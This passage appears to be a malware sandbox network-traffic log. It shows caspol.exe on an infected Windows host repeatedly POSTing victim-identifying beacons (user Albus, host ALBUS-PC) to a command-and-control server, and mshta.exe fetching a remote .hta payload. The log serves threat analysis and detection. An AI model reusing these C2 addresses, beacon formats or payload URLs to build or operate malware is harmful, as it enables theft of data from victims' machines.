Nov 21, 2024 01:20:46.890770912 CET	1236	IN	Data Raw: 74 65 00 44 65 62 75 67 67 65 72 4e 6f 6e 55 73 65 72 43 6f 64 65 41 74 74 72 69 62 75 74 65 00 44 65 62 75 67 67 61 62 6c 65 41 74 74 72 69 62 75 74 65 00 45 64 69 74 6f 72 42 72 6f 77 73 61 62 6c 65 41 74 74 72 69 62 75 74 65 00 43 6f 6d 56 69 Data Ascii: teDebuggerNonUserCodeAttributeDebuggableAttributeEditorBrowsableAttributeComVisibleAttributeAssemblyTitleAttributeAssemblyTrademarkAttributeTargetFrameworkAttributeAssemblyFileVersionAttributeAssemblyConfigurationAttributeAssemblyDes
Nov 21, 2024 01:20:47.011028051 CET	1236	IN	Data Raw: 00 52 63 70 74 54 6f 00 4d 65 74 68 6f 64 49 6e 66 6f 00 43 75 6c 74 75 72 65 49 6e 66 6f 00 42 69 74 6d 61 70 00 53 77 61 70 00 53 6c 65 65 70 00 68 65 6c 70 00 67 65 74 5f 4a 56 6d 70 00 4e 6f 6f 70 00 73 65 74 5f 54 61 62 53 74 6f 70 00 49 53 Data Ascii: RcptToMethodInfoCultureInfoBitmapSwapSleephelpget_JVmpNoopset_TabStopISmtp_smtpGroupStartupClearset_UseSystemPasswordCharInvokeMemberStringBuildersenderBinderget_ResourceManagerComponentResourceManagerFormClosedEventHand

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.22	49167	94.156.177.41	80	3232	C:\Users\user\AppData\Roaming\caspol.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 01:21:00.927619934 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 176 Connection: close
Nov 21, 2024 01:21:01.047198057 CET	176	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 36 00 35 00 33 00 36 00 37 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: 'ckav.ruAlbus065367ALBUS-PCk0DE4229FCF97F5879F50F8FD3QciFF
Nov 21, 2024 01:21:02.418904066 CET	185	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 21 Nov 2024 00:21:02 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.22	49168	94.156.177.41	80	3232	C:\Users\user\AppData\Roaming\caspol.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 01:21:03.680485010 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 176 Connection: close
Nov 21, 2024 01:21:03.800167084 CET	176	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 36 00 35 00 33 00 36 00 37 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: 'ckav.ruAlbus065367ALBUS-PC+0DE4229FCF97F5879F50F8FD3q5KSE
Nov 21, 2024 01:21:05.204158068 CET	185	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 21 Nov 2024 00:21:04 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.22	49172	94.156.177.41	80	3232	C:\Users\user\AppData\Roaming\caspol.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 01:21:05.572350025 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 149 Connection: close
Nov 21, 2024 01:21:05.691982031 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 36 00 35 00 33 00 36 00 37 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus065367ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 21, 2024 01:21:07.116107941 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 21 Nov 2024 00:21:06 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.22	49173	94.156.177.41	80	3232	C:\Users\user\AppData\Roaming\caspol.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 01:21:07.397494078 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 149 Connection: close
Nov 21, 2024 01:21:07.518235922 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 36 00 35 00 33 00 36 00 37 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus065367ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 21, 2024 01:21:09.249010086 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 21 Nov 2024 00:21:09 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.22	49171	192.3.243.136	80	3768	C:\Windows\System32\mshta.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 01:21:07.489490986 CET	509	OUT	GET /xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta HTTP/1.1 Accept: / Accept-Language: en-US UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) If-Modified-Since: Wed, 20 Nov 2024 01:22:20 GMT Connection: Keep-Alive Host: 192.3.243.136 If-None-Match: "2c850-6274dfb369376"
Nov 21, 2024 01:21:08.064347982 CET	275	IN	HTTP/1.1 304 Not Modified Date: Thu, 21 Nov 2024 00:21:07 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Wed, 20 Nov 2024 01:22:20 GMT ETag: "2c850-6274dfb369376" Accept-Ranges: bytes Keep-Alive: timeout=5, max=100 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.22	49174	94.156.177.41	80	3232	C:\Users\user\AppData\Roaming\caspol.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 01:21:09.884682894 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 149 Connection: close
Nov 21, 2024 01:21:10.006433010 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 36 00 35 00 33 00 36 00 37 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus065367ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 21, 2024 01:21:11.401561975 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 21 Nov 2024 00:21:11 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.22	49175	94.156.177.41	80	3232	C:\Users\user\AppData\Roaming\caspol.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 01:21:11.866086960 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 149 Connection: close
Nov 21, 2024 01:21:11.985822916 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 36 00 35 00 33 00 36 00 37 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus065367ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 21, 2024 01:21:13.380825043 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 21 Nov 2024 00:21:13 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.22	49176	94.156.177.41	80	3232	C:\Users\user\AppData\Roaming\caspol.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 01:21:13.730773926 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 149 Connection: close
Nov 21, 2024 01:21:13.850406885 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 36 00 35 00 33 00 36 00 37 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus065367ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 21, 2024 01:21:15.243304968 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 21 Nov 2024 00:21:15 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.22	49177	94.156.177.41	80	3232	C:\Users\user\AppData\Roaming\caspol.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 01:21:15.504970074 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 149 Connection: close
Nov 21, 2024 01:21:15.628174067 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 36 00 35 00 33 00 36 00 37 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus065367ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 21, 2024 01:21:17.082302094 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 21 Nov 2024 00:21:16 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.22	49178	94.156.177.41	80	3232	C:\Users\user\AppData\Roaming\caspol.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 01:21:17.624038935 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 149 Connection: close
Nov 21, 2024 01:21:17.743709087 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 36 00 35 00 33 00 36 00 37 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus065367ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 21, 2024 01:21:19.199143887 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 21 Nov 2024 00:21:18 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.22	49179	94.156.177.41	80	3232	C:\Users\user\AppData\Roaming\caspol.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 01:21:19.929555893 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 149 Connection: close
Nov 21, 2024 01:21:20.049266100 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 36 00 35 00 33 00 36 00 37 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus065367ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 21, 2024 01:21:21.471924067 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 21 Nov 2024 00:21:21 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.22	49180	94.156.177.41	80	3232	C:\Users\user\AppData\Roaming\caspol.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 01:21:21.787765026 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 149 Connection: close
Nov 21, 2024 01:21:21.907578945 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 36 00 35 00 33 00 36 00 37 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus065367ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 21, 2024 01:21:23.365457058 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 21 Nov 2024 00:21:23 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.22	49181	94.156.177.41	80	3232	C:\Users\user\AppData\Roaming\caspol.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 01:21:23.623265028 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 149 Connection: close
Nov 21, 2024 01:21:23.743036985 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 36 00 35 00 33 00 36 00 37 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus065367ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 21, 2024 01:21:25.118063927 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 21 Nov 2024 00:21:24 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.22	49182	94.156.177.41	80	3232	C:\Users\user\AppData\Roaming\caspol.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 01:21:25.366930962 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 149 Connection: close
Nov 21, 2024 01:21:25.486576080 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 36 00 35 00 33 00 36 00 37 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus065367ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 21, 2024 01:21:26.718843937 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 21 Nov 2024 00:21:26 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.22	49183	94.156.177.41	80	3232	C:\Users\user\AppData\Roaming\caspol.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 01:21:26.978240967 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 149 Connection: close
Nov 21, 2024 01:21:27.098177910 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 36 00 35 00 33 00 36 00 37 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus065367ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 21, 2024 01:21:28.558785915 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 21 Nov 2024 00:21:28 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.22	49184	94.156.177.41	80	3232	C:\Users\user\AppData\Roaming\caspol.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 01:21:28.899151087 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 149 Connection: close
Nov 21, 2024 01:21:29.018877029 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 36 00 35 00 33 00 36 00 37 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus065367ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 21, 2024 01:21:30.434880972 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 21 Nov 2024 00:21:30 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.22	49185	94.156.177.41	80	3232	C:\Users\user\AppData\Roaming\caspol.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 01:21:30.774710894 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 149 Connection: close
Nov 21, 2024 01:21:30.894519091 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 36 00 35 00 33 00 36 00 37 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus065367ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 21, 2024 01:21:32.330276966 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 21 Nov 2024 00:21:32 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.22	49186	94.156.177.41	80	3232	C:\Users\user\AppData\Roaming\caspol.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 01:21:32.606748104 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 149 Connection: close
Nov 21, 2024 01:21:32.726629972 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 36 00 35 00 33 00 36 00 37 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus065367ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 21, 2024 01:21:34.180011034 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 21 Nov 2024 00:21:33 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.22	49187	94.156.177.41	80	3232	C:\Users\user\AppData\Roaming\caspol.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 01:21:34.438380003 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 149 Connection: close
Nov 21, 2024 01:21:34.558557987 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 36 00 35 00 33 00 36 00 37 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus065367ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 21, 2024 01:21:35.978378057 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 21 Nov 2024 00:21:35 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.22	49188	94.156.177.41	80	3232	C:\Users\user\AppData\Roaming\caspol.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 01:21:36.246083021 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 149 Connection: close
Nov 21, 2024 01:21:36.365955114 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 36 00 35 00 33 00 36 00 37 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus065367ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 21, 2024 01:21:37.749514103 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 21 Nov 2024 00:21:37 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.22	49189	94.156.177.41	80	3232	C:\Users\user\AppData\Roaming\caspol.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 01:21:38.020303965 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 149 Connection: close
